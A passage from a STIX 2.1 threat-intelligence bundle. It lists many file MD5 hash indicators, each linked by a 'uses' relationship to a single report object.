      "target_ref": "indicator--138d4ac3-bd90-5655-ba98-c34824f84920"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6da94cf8-e5f1-5b35-b1b9-f6a8d814ce8b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 2f76a29d4e4292d7f29a29345717812c",
      "pattern": "[file:hashes.MD5 = '2f76a29d4e4292d7f29a29345717812c']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--81ee25cd-f0b6-5e74-879e-c480387e70f2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--6da94cf8-e5f1-5b35-b1b9-f6a8d814ce8b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6d889700-4861-53d5-9d55-659263c2c564",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 3158a3849ea2695d6ec5aea6512fd030",
      "pattern": "[file:hashes.MD5 = '3158a3849ea2695d6ec5aea6512fd030']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--26dff6d5-27cb-58a6-b118-077f5f3a9201",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--6d889700-4861-53d5-9d55-659263c2c564"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9dbbd926-62d5-5893-a132-26506570c1d8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 348b0ce6af4698061678c8e92b4b2675",
      "pattern": "[file:hashes.MD5 = '348b0ce6af4698061678c8e92b4b2675']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cefcc8b0-f410-5da3-bee2-21329e37c0b6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--9dbbd926-62d5-5893-a132-26506570c1d8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--10092bd3-821c-546e-a785-5118b8a486b5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 37155f0bca29ccd6b6d4f5b2bc42eb4d",
      "pattern": "[file:hashes.MD5 = '37155f0bca29ccd6b6d4f5b2bc42eb4d']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--38c2b8aa-3d4d-5e8f-9f0a-e1c8a39ec8c3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--10092bd3-821c-546e-a785-5118b8a486b5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2d8ab146-2217-5cdf-84d9-e3d187a9b24d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 3b10127e65fa3e215d21e0a2e7fd32be",
      "pattern": "[file:hashes.MD5 = '3b10127e65fa3e215d21e0a2e7fd32be']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--890af650-634a-525b-8ac6-108a68cbde7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--2d8ab146-2217-5cdf-84d9-e3d187a9b24d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--603e100e-de95-55c2-8ae1-14b79ae32f8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 417ad60624345ef85e648038e18902ab",
      "pattern": "[file:hashes.MD5 = '417ad60624345ef85e648038e18902ab']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c6ff8f43-a997-5bc3-822b-7aaa8049277b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--603e100e-de95-55c2-8ae1-14b79ae32f8f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--695dca45-0557-595d-92fe-95e2d46511b8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 420a2c53386678396f972f09cc7f3a5c",
      "pattern": "[file:hashes.MD5 = '420a2c53386678396f972f09cc7f3a5c']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2e21d92c-5de1-5ba4-b144-f95898711ecc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--695dca45-0557-595d-92fe-95e2d46511b8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a2d62e4a-f3b5-5451-af3b-c7158760a397",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 4a3f22021e4415e8211633fb3735a046",
      "pattern": "[file:hashes.MD5 = '4a3f22021e4415e8211633fb3735a046']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a3dfe4b5-22d1-5ddc-bacb-b126b4d971b4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--a2d62e4a-f3b5-5451-af3b-c7158760a397"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f60df4d4-e658-5350-aa54-e855a329a0fb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 4ea8adecc5bd45a76cc61430c560924f",
      "pattern": "[file:hashes.MD5 = '4ea8adecc5bd45a76cc61430c560924f']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--23a69cdb-f21e-5b06-beec-a474d4fcc4af",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--f60df4d4-e658-5350-aa54-e855a329a0fb"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b1a2f547-f868-51e4-9cb0-8100299a7bf4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 53c8a4f0497929de4a5039b2c14bf426",
      "pattern": "[file:hashes.MD5 = '53c8a4f0497929de4a5039b2c14bf426']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2e5520c9-39f8-5c6b-9fe3-e7cd6a42e4c5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--b1a2f547-f868-51e4-9cb0-8100299a7bf4"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--39a6a47d-3f95-5d38-aa73-f6ae444288bf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 575b26c1cc06609722f98e2beaed6a8a",
      "pattern": "[file:hashes.MD5 = '575b26c1cc06609722f98e2beaed6a8a']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--244cb05e-6b08-52a1-8d44-85b4e9bbf580",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--39a6a47d-3f95-5d38-aa73-f6ae444288bf"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8eff4baa-801d-5bcb-9823-2f7c2cf8e34f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 5862f9fc9c9a0d766eba29eb4945f619",
      "pattern": "[file:hashes.MD5 = '5862f9fc9c9a0d766eba29eb4945f619']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--190fbe6b-3fc1-540b-ac49-8be43a274e17",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--8eff4baa-801d-5bcb-9823-2f7c2cf8e34f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4170b343-6458-528b-9c46-b5f08cfee4c0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 59d756280b06cf113ca43abc0050edd5",
      "pattern": "[file:hashes.MD5 = '59d756280b06cf113ca43abc0050edd5']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fcedf606-cb25-5a82-af6e-f3ec939d6cd4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--4170b343-6458-528b-9c46-b5f08cfee4c0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--210a832f-a140-5371-994b-8ff3c497bffe",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 5cffa3126b9effc279d32b2cf4ef2278",
      "pattern": "[file:hashes.MD5 = '5cffa3126b9effc279d32b2cf4ef2278']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--23ce2dd8-86b1-56d4-aaa1-e308dd0574be",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--210a832f-a140-5371-994b-8ff3c497bffe"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--651cc705-df00-53f0-8183-8783d8180ccf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 64a590760fdbb84356544cc90ac3d50f",
      "pattern": "[file:hashes.MD5 = '64a590760fdbb84356544cc90ac3d50f']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2b9e6611-f3b9-5382-a322-51af4d24ea85",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--651cc705-df00-53f0-8183-8783d8180ccf"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--01e2c23e-b072-5e6f-aea0-92e81145c10a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 670fe8faaede4e2e033311fb662d2a4a",
      "pattern": "[file:hashes.MD5 = '670fe8faaede4e2e033311fb662d2a4a']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f17a45b5-5917-5610-8a19-6817546b96cf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--01e2c23e-b072-5e6f-aea0-92e81145c10a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fc4921dd-4e62-527f-b711-0d6e44bc6f19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 6f893b1cc5cf534c59eabe932c1bf21e",
      "pattern": "[file:hashes.MD5 = '6f893b1cc5cf534c59eabe932c1bf21e']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c3f659ee-9e0b-5e0b-a615-723e05bc986c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--fc4921dd-4e62-527f-b711-0d6e44bc6f19"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bc268fae-2637-5646-9cbd-fd73e6327b18",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 6fc6164b3a08669992acad3764fb1922",
      "pattern": "[file:hashes.MD5 = '6fc6164b3a08669992acad3764fb1922']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--55111150-ee60-5fa6-aeb0-78d4f68ac075",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--bc268fae-2637-5646-9cbd-fd73e6327b18"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1f7f491c-365b-51a3-a1dc-b5678f9066b7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 826a8e8c05983aa3a884d7abcfa473ac",
      "pattern": "[file:hashes.MD5 = '826a8e8c05983aa3a884d7abcfa473ac']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--56091975-729e-58ae-95dd-a5ee56432aea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--1f7f491c-365b-51a3-a1dc-b5678f9066b7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1e6fc5f6-fa7b-530b-bd5d-e41915f2c745",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 88630916b0c6633ca28c8896416a93ee",
      "pattern": "[file:hashes.MD5 = '88630916b0c6633ca28c8896416a93ee']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--55e120fe-a44f-58a9-af26-6520bf05af51",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--1e6fc5f6-fa7b-530b-bd5d-e41915f2c745"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--af199930-f9bb-5550-8a52-b4b4431b9615",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 88bb86494cb9411a9692f9c8e67ed32c",
      "pattern": "[file:hashes.MD5 = '88bb86494cb9411a9692f9c8e67ed32c']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6acddccb-a4e8-5c9b-8c20-3a7f2b9827d5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--af199930-f9bb-5550-8a52-b4b4431b9615"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--72032c37-f542-5a3a-86cc-1fd4d1eb4c0c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 8ca5c9745e8a0e18167a9b932821645a",
      "pattern": "[file:hashes.MD5 = '8ca5c9745e8a0e18167a9b932821645a']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c09aa52c-1799-5fe9-a915-5e713562b73e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--72032c37-f542-5a3a-86cc-1fd4d1eb4c0c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--79b152ff-e8c2-5901-ba87-327500a83c1a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 964c13b68dc6b6b918b66a9a10469d2a",
      "pattern": "[file:hashes.MD5 = '964c13b68dc6b6b918b66a9a10469d2a']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f55999d4-4d17-5da5-a8eb-5784afbf173e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--79b152ff-e8c2-5901-ba87-327500a83c1a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e8f6dfdc-b6c7-52d7-9f59-338953dfd7be",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 996c394d0f6d6967df9542c52f6f4661",
      "pattern": "[file:hashes.MD5 = '996c394d0f6d6967df9542c52f6f4661']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2a07cf4a-6590-5345-b3bb-45ed525086a8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--e8f6dfdc-b6c7-52d7-9f59-338953dfd7be"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--53c9734c-1343-54d5-9a64-323f3a3c0435",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 9befad1d56d2bd8195813aea1f37f921",
      "pattern": "[file:hashes.MD5 = '9befad1d56d2bd8195813aea1f37f921']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e94de103-e1c3-5a2c-8a99-361a366c5e10",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--53c9734c-1343-54d5-9a64-323f3a3c0435"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fa219086-0324-511d-947c-f80066c209cc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 9ea321b6a0f069caab7092cfe1cbbde0",
      "pattern": "[file:hashes.MD5 = '9ea321b6a0f069caab7092cfe1cbbde0']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ea9937f1-6318-5887-b00c-b9cc6a6b6d88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--fa219086-0324-511d-947c-f80066c209cc"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f6addb40-eb49-5e05-98fc-8039c3f602a2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: 9f510626c7327a7c2328bc5131726638",
      "pattern": "[file:hashes.MD5 = '9f510626c7327a7c2328bc5131726638']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--05d5880e-d933-5ace-8911-e198e244c318",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--f6addb40-eb49-5e05-98fc-8039c3f602a2"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b51fbe50-d845-580f-828b-c10e8e0c5029",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: a6302fdb63e2244c1246a73a7d65d09e",
      "pattern": "[file:hashes.MD5 = 'a6302fdb63e2244c1246a73a7d65d09e']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5109b97c-f009-56b5-ba3c-c22b76b84a8e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--b51fbe50-d845-580f-828b-c10e8e0c5029"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--60b3ccfd-1141-5bb4-bca4-f38649f6acc5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: a7ab0969bf6641cd0c7228ae95f6d217",
      "pattern": "[file:hashes.MD5 = 'a7ab0969bf6641cd0c7228ae95f6d217']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--109ac9b7-041a-5bbf-8bee-4e1850fcfe9e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--60b3ccfd-1141-5bb4-bca4-f38649f6acc5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--edc98aac-3934-5ef6-a1fa-94a79d8693dd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: a7e7d00d531cb7ca27d0f3bee448573f",
      "pattern": "[file:hashes.MD5 = 'a7e7d00d531cb7ca27d0f3bee448573f']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--89efb1bd-afe7-5c9f-a9b8-ad647f74f943",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--edc98aac-3934-5ef6-a1fa-94a79d8693dd"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b8632b5d-d764-5ffa-b6a6-311634fb12ce",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: ab05a1925fee8334a2114811d5283364",
      "pattern": "[file:hashes.MD5 = 'ab05a1925fee8334a2114811d5283364']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6767c8da-f551-5b05-80c5-0d0783149475",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--b8632b5d-d764-5ffa-b6a6-311634fb12ce"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4bf22439-9936-57dc-9393-599e7ab81077",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: b04e8ee43aba85fa5c585b9335c953c2",
      "pattern": "[file:hashes.MD5 = 'b04e8ee43aba85fa5c585b9335c953c2']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2e448bd0-2843-5a51-a0cc-e25fc43b92ed",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--4bf22439-9936-57dc-9393-599e7ab81077"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2b28b390-44da-57a5-b84c-7475af6f15b3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: b4a6152514919a637c22a58bea316fc7",
      "pattern": "[file:hashes.MD5 = 'b4a6152514919a637c22a58bea316fc7']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ad7464e3-27e6-5d1a-ab6c-fd0f6346b207",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--2b28b390-44da-57a5-b84c-7475af6f15b3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d2c27e33-a796-5aab-bb06-df5c2d76d057",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: bed0f34673cc93560c17e3ab04ea5d19",
      "pattern": "[file:hashes.MD5 = 'bed0f34673cc93560c17e3ab04ea5d19']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9c3b4acf-2066-51e1-b5e5-8d3ceba84da1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--d2c27e33-a796-5aab-bb06-df5c2d76d057"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1f773f36-e1be-543a-a12c-e2f6b3c7105c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_md5: d1c331c17ddd4abe0d53755461c1ec9a",
      "pattern": "[file:hashes.MD5 = 'd1c331c17ddd4abe0d53755461c1ec9a']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T19:06:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fac8769b-69c5-5b55-8ec2-0447f81bb9c9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--71b139f5-edf4-5e5a-a58a-0e6ff558f61e",
      "target_ref": "indicator--1f773f36-e1be-543a-a12c-e2f6b3c7105c"
